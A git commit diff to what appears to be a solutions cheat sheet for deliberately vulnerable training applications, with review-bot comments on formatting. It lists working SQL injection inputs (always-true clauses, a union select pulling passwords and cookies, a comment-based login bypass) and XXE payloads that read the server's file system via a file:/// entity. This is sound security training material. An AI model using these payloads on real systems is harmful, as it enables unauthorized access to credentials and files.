update for XXE solutions

Jason White 2017-06-27 08:27:06 -04:00
parent 06a3f5d189
commit 3a9bb946ed

@ -3,6 +3,9 @@ Basic
Smith - to show it returns smith's records
Smith' or '1'='1 - to show exploit; 1=1 can be any true clause
**Bender Login
bender@juice-sh.op' --
[2:19 PM]
101
101 or 1=1
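Review bot: The line `[2:19 PM]` in this hunk looks like a chat timestamp that was pasted in with the new entry rather than a test input, and should be dropped. The `**Bender Login` heading has an unclosed `**` and, unlike the Smith entries above it, carries no short description of what the input demonstrates; suggest `**Bender Login**` followed by the input in the same `input - to show ...` form. Since the address is on juice-sh.op and the surrounding entries do not name their target, a one-line note saying which application and lesson each group belongs to would keep the file usable as a reference.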
@ -11,7 +14,7 @@ Smith' union select userid,user_name, password,cookie,cookie, cookie,userid from
## XXE ##
Simple - <?xml version="1.0" standalone="yes" ?><!DOCTYPE user [<!ENTITY root SYSTEM "file:///"> ]><user> <username>&root;</username><password>test</password></user>
Simple <?xml version="1.0" standalone="yes" ?><!DOCTYPE comment [<!ENTITY root SYSTEM "file:///"> ]><comment> <text>&root;</text><password>test</password></comment>
Modern Rest Framework - change content type to: Content-Type: application/xml &&
<?xml version="1.0" standalone="yes" ?><!DOCTYPE user [<!ENTITY root SYSTEM "file:///"> ]><user> <username>&root;</username><password>test</password></user>
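Review bot: The `comment`/`text` variant of the Simple entry still contains `<password>test</password>`, which looks like a leftover from the `user` payload; please confirm it belongs there or remove it. That line also drops the ` - ` separator used by the other Simple line, and the Modern Rest Framework entry still uses `user`/`username`, so it is unclear whether it was meant to be updated in the same change. The trailing `&&` after the Content-Type instruction would read more clearly as plain words, and a short label on each variant saying which lesson it is the solution for would remove the ambiguity between the two Simple lines.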